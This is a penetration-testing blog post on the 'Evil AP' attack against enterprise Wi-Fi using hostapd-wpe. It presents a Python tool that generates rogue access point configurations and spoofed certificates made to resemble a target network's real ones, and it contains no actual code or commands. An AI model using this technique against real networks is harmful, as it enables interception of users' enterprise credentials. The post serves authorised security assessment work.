We’ve written in the past about the “Evil twin” or “Evil AP” attack using hostapd-wpe (“wireless pwnage edition”). This remains a viable attack in environments using enterprise authentication, and the patched hostapd obviates the need for a wireless access point, making the attack easy and portable.
However, like most attacks there are still opportunities for tweaking and optimization. In the case of the Evil AP attack against enterprise authentication, one of these areas is in the certificates presented by the attacker’s AP.
The hostapd-wpe repository includes the freeradius “bootstrap” certificate generation shell script which can be used to quickly generate some CA and Server certificates for testing hostapd-wpe in enterprise authentication mode. The certificates generated by this script have the common name of “Example Server Certificate,” and look like this when displayed on a connecting iOS device:
Unless you’re targeting the offices of Example, Inc. in Radius, France (I hear it’s nice this time of year), these aren’t particularly convincing (nor are they intended to be). Though we see some pretty generic self-signed certificates out there from time to time, I haven’t personally seen any labeled “example” yet.
To be clear, the parameters on the certificate matter when users are able to select which certificates to trust. Our own anecdotal evidence suggests that overall, administrators are getting better about not allowing users to authorize new servers or certification authorities (which is a long-standing recommendation).
Despite improvements, there is always the chance that this option will still be presented to users, or that you’ll find the one device (the fabled “CEO’s iPad”) that is able to connect to an enterprise network, but not subject to the same hardening guidelines as other devices. In cases such as those, it’s important to make the certificate presented by the evil AP as convincing as possible.
The parameters of the certificates generated by the bootstrap script are included in the CA.cnf and Server.cnf files:
Editing these is entirely possible, but tedious, and may require changing the directory in which they are generated or the location that your hostapd-wpe configuraiton file points to.
This Python script, apd_launchpad, helps address that problem by providing a convenient way to create a hostapd-wpe configuration file and the associated spoofed certificates. It’s designed to be dropped in the directory where hostapd-wpe resides, and when executed creates a self-contained folder that can be removed after an assessment. It has been tested on Kali 2.0 rolling and Fedora. Thanks to @zerosteiner for code improvements and testing.
The script takes the parameters necessary for hosting a functional spoofed wireless network (SSID, channel, broadcast or hidden SSID, bridge interface if conducting a man-in-the-middle attack, etc.) as well as the parameters for faking a certificate (common name, organization, location, etc.) In the event that trusting a certificate is left up to the user, these options should allow you to quickly create one that, at a glance, resembles whatever is actually in use on the target network.
Hopefully the tool provides additional flexibility to the hostapd-wpe attack, and allows you to quickly craft configurations suited to your target environment. Happy hunting.
digby sends.